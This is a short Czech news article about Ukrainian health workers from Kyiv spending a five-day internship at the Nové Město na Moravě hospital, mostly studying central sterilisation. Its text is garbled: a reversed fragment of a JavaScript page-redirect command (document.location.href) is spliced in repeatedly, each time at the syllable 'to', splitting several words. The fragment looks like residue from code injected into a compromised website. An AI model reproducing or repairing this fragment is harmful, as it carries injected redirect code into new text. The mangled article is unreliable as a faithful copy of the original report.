Rainbow page separator

Ukrajinští zdravotníci prošli stáží v novoměstské nemocnici

Úterý, 3. září 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Pět dnů trvající stáž strávili poslední prázdninový týden ukrajinští zdravotníci v novoměstské nemocnici. Zdravotníky, kteří pracují v kyjevských nemocnicích, zajímala prioritně činnost oddělení centrální sterilizace, ale nahlédli i do jiných provozů a oddělení. „Program jsme připravili tak, aby je bavil a aby pro ně byl co nejpřínosnější. Takže většinu [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, co jsme jim o práci našeho oddělení řekli, si také pod dohledem sester sami vyzkoušeli,“ popsala vrchní sestra oddělení centrální sterilizace Irena Svobodová.
Mezi stážisty byli čtyři zdravotníci a jeden zástupce firmy BMT, jejíž česká pobočka nemocnici o ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to druh spolupráce požádala. „Zdravotníci se zajímali hlavně o chod oddělení centrální sterilizace. Ať už je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to budování systémů kvality, odpovědné provádění technologií dekontaminace, dezinfekce, mytí, balení, sterilizace, transportu, uskladnění, kontroly, dokladovatelnost procesů a tak dále. Jsme moc rádi, že novoměstská nemocnice nám vyšla vstříc a její pracovníci se ukrajinským kolegům věnovali,“ sdělil Miroslav Musil ze společnosti BMT.
„Zajímalo mě například, jak se tady přepravují nástroje z operačních sálů,“ uvedl jeden z účastníků stáže Dmytro Maliava, vedoucí centrální sterilizace v soukromé kyjevské klinice Boris. „V současné době naše klinika plánuje stavbu největší centrální sterilizace v Kyjevě, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jsem se rád podíval, jak u vás máte vše vyřešeno,“ doplnil Maliava.